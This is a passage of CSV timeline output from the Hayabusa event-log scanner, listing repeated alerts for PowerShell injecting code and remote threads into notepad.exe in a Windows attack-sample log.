Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.926 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.942 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.942 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.942 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.973 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.973 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.973 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.989 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.989 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.989 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.005 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.005 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.005 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.020 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.020 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.020 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.036 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.036 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.036 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.051 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.051 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.051 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.083 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.083 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.083 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.098 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.098 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.098 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.114 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.114 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.114 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.130 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.130 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.130 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.145 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.145 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.145 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.161 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.161 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.161 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.176 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.176 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.176 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.192 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.192 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.192 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.208 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.208 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.208 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.223 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.223 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.223 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.239 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.239 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.239 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.270 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.270 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.270 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.286 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.286 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.286 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.301 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.301 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.301 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.317 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.317 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.317 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.348 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.348 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.348 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.364 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.364 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
